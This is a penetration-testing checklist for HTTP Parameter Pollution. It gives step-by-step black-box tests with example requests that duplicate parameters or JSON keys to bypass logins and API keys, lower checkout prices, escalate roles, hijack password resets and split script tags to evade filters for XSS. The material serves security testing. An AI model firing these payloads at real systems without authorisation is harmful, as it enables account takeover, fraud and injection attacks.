HTTP Parameter Pollution

Check List

Methodology

Black Box

Test Query String Pollution

1

To test for SSPP in query strings, you can insert query syntax characters like #, &, and = into your input and observe how the application responds

2

Consider a vulnerable application that searches for users based on their username. The request might look like this

GET /usernameSearch?name=jack&returningPath=/main

3

The server translates this to an internal API request

GET /usernames/search?name=jack#foo&publicProfile=true

4

If the query is truncated, the publicProfile parameter might be bypassed, potentially exposing non-public profiles

---

Bypassing Authentication

1

Prepare a test login endpoint that accepts username and password parameters

2

Record a normal login request

POST /login
username=admin&password=wrongpassword

3

Send the request with multiple password values

POST /login
username=admin&password=wrongpassword&password=correctpassword

4

Inspect the server response and session behavior (cookies). If authentication succeeds because the last or a specific occurrence is processed, HPP is present

---

Manipulating SQL Queries (Overwriting id)

1

Identify the endpoint that reads id and returns a user profile (e.g., /profile?id=...)

2

Record a normal request and note the response

GET /profile?id=1

3

Send a request with duplicated id parameters

GET /profile?id=1&id=2

---

Tampering with API Calls (API key parameter)

1

Identify an API endpoint using apikey for authentication ( /api/data?user=123&apikey=...)

2

Record a request with an invalid key

3

Send a request with multiple apikey parameters where a valid key appears last

GET /api/data?user=123&apikey=invalid-key&apikey=valid-key

4

Check whether access is granted; if the last parameter is used and access is allowed, HPP is confirmed

---

Altering Price Calculations (E-commerce)

1

Locate the checkout endpoint that accepts a price parameter

2

Record a normal purchase request

POST /checkout
product=123&price=100

3

Send the request with duplicate price values

POST /checkout
product=123&price=100&price=1

4

Verify server response, cart totals, or final calculation; if the last price is applied resulting in reduced cost, HPP is present

---

Bypassing Input Validation and WAF (XSS evasion)

1

Identify a point that reflects or stores user input (e.g., comment parameter)

2

Note a simple blocked input example

comment=<script>alert(1)</script>

3

Send input with fragmented/duplicated parameter pieces so the server-side reconstruction may bypass filters, for example

comment=<scr&comment=ipt>alert(1)</scr&comment=ipt>

---

HTTP Parameter Pollution (Privilege Escalation)

1

First, an attacker identifies a vulnerable endpoint that accepts query parameters. This can be done through manual testing or automated tools like Burp Suite

2

Next, the attacker crafts a request with duplicate parameters or adds unexpected parameters to the URL

https://example.com/api/user?role=admin&role=user

3

In this case, if the application does not properly validate the ‘role’ parameter, it might grant admin privileges to the user

4

The attacker then analyzes the server’s response to see if the manipulation led to any unexpected behavior. Successful exploitation can result in privilege escalation, information disclosure, or even remote code execution, depending on the application’s logic

---

Broken Access Control

1

Enter the site and use the Burp Suite tool to identify the points of a site

2

Identify initial API endpoint

GET /api/v1/user/profile?userId=12345 

3

and send simple request to observe normal server behavior

4

Check if you can access other accounts by adding another parameter as shown below

GET /api/v1/user/profile?userId=12345&userId=67890

5

If it gives an error, we will keep the value constant, but we will add a parameter and check the behavior of the server

GET /api/v1/user/profile?userId=12345&userId=12345

---

JSON Parameter Pollution In Export Proccess

1

Check out endpoints that perform the extraction process in different formats, for example the following request in an API Endpoint

POST /api/admin/exportData
Content-Type: application/json

{"format":"csv","filters":{"userId":12345}}

2

In this request, we have to check what will be the answer to the server's request if we add another format parameter, for example

{"format":"csv","format":"json"}

3

If it gives us an error in the answer as below

{"error":"Unexpected token , in JSON at position 15"}

4

Send the next request using capital words as shown below

{"format":"csv","Format":"json"}

5

in Response

{"status":"processing","file":"/exports/data-2023-10-25.json"}

---

JSON Parameter Pollution Authentication bypass

1

Perform the authentication process and intercept the application process

2

If there are parameters in the request as below

POST /api/auth/verify
Content-Type: application/json

{"token":"user_token_123","role":"user"}

3

Try to add other parameters to the request as shown below

{"token":"user_token_123","token":"admin_token_abc","role":"user","role":"admin"}

4

The response

{"authenticated": true, "user": "admin", "permissions": ["read","write","delete"]}

---

Test Case in Login Parameter

1

Enter the site and use the Burp Suite tool to identify the points of a site

2

Identify initial JSON API endpoint /api/v1/auth/login

3

and send simple request to observe normal server behavior

{
    "username": "alice",
    "password": "pass123"
}

4

Test HPP by adding duplicate keys as shown below

{
    "username": "alice",
    "password": "pass123",
    "username": "bob"
}

5

If it processes first value for auth but last for update, we will keep the key constant but duplicate and check the behavior of the server

{
    "role": "user",
    "role": "admin"
}

6

Test password reset abuse /api/v1/reset-password

POST /api/v1/reset-password
{
    "username": "alice",
    "new_password": "NewPass123",
    "confirm_password": "NewPass123",
    "username": "bob"
}

7

Test input filter bypass /api/v1/update-profile

{
    "email": "justanexample@example.com",
    "email": "<script>alert(1)</script>"
}

---

White Box

Cheat Sheet